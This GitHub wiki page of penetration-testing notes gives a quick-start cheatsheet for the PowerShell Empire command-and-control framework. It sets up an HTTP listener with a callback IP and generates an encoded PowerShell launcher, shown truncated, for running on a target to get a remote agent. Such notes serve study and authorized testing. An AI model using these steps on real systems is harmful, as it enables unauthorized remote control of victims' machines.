Skip to content

Powershell Empire Quick Start Cheatsheet

Jump to bottom
TheGetch edited this page May 14, 2021 · 2 revisions

Powershell Empire Quick Start Cheatsheet

Empire setup:

uselistener http
set Port 9000
set BindIP 0.0.0.0
set Host http://66.35.63.203:9000 (skippy)
execute

back

usestager multi/launcher
set Listener http
execute

Prints something like this: powershell -noP -sta -w 1 -enc SQB<snip>AWAA=

  • You run this in the targets Windows' Powershell

agents (lists agents)

#powershell

_Sidebar

Home

1. Recon

Ping Sweep

CIDR to IP

2. Enumeration

Enumeration General Notes

Host/Port Scanning

Services

01. FTP (21)

02. SSH (22)

03. SMTP (25)

04. DNS (53)

05. HTTP (80,443,8080,8443,etc.)

06. POP3 (110)

07. SMB (139,445)

08. SNMP (161,162)

09. LDAP (389)

10. MS-SQL or MySQL (1433,3306)

11. RDP (3389)

12. Winrm (5985)

13. Memcache (11221)

3. Exploitation

Exploitation General Notes

4. Post Exploiation

Post Exploitation General Notes

Editable Service

Privilege Escalation

Scheduled Jobs/Tasks

5. High Value Information

Hashes

6. Reporting

7. Random Notes/Useful Tidbits

Clone this wiki locally